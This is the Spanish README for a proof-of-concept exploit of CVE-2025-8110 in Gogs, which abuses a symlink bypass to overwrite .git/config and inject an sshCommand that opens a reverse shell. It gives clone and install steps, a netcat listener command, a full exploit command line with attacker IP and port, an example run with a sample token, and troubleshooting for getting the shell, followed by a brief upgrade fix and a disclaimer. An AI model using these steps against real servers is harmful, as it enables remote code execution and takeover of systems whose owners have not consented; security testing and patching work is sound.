
Gogs RCE PoC - CVE-2025-8110
Prueba de concepto para CVE-2025-8110 - Ejecución Remota de Código en Gogs mediante bypass de enlace simbólico e inyección de sshCommand.
Este exploit abusa de un bypass de enlace simbólico en la API de Gogs para sobrescribir .git/config e inyectar un sshCommand malicioso que ejecuta una reverse shell.
git clone https://github.com/X4BROZER/CVE-2025-8110.git
cd CVE-2025-8110
pip install -r requirements.txt
Argumento Descripción -u, --url URL objetivo de Gogs (ej., http://target:3000) -U, --username Usuario de Gogs -P, --password Contraseña de Gogs -t, --token Token de API de Gogs -lh, --host Tu IP para la reverse shell -lp, --port Tu puerto para el listener -x, --proxy Habilitar proxy (localhost:8080)
Inicia sesión en Gogs → Configuración → Aplicaciones → Generar token
nc -lvnp 4444
python3 exploit.py -u http://target:3000 -U <USERNAME GOGS> -P <PASSWORD GOGS> -t <TOKEN> -lh <ATTACKER IP> -lp <ATTACKER PORT>
python3 exploit.py -u http://localhost:3001 -U amine -P amine -t 44f4e64a1e6353f247050055aa0d3cc13b577ac3 -lh 10.10.17.134 -lp 4444
Problema Solución Inicio de sesión fallido Verificar usuario/contraseña Creación de repositorio fallida Regenerar token de API Tiempo de espera agotado (read timeout) Normal - verificar listener Sin shell Verificar firewall, probar otro puerto
Actualizar a Gogs v0.13.4 o posterior:
wget https://dl.gogs.io/v0.13.4/gogs_v0.13.4_linux_amd64.tar.gz
tar -xzf gogs_v0.13.4_linux_amd64.tar.gz
Esta herramienta es solo para fines educativos y pruebas autorizadas. El acceso no autorizado es ilegal.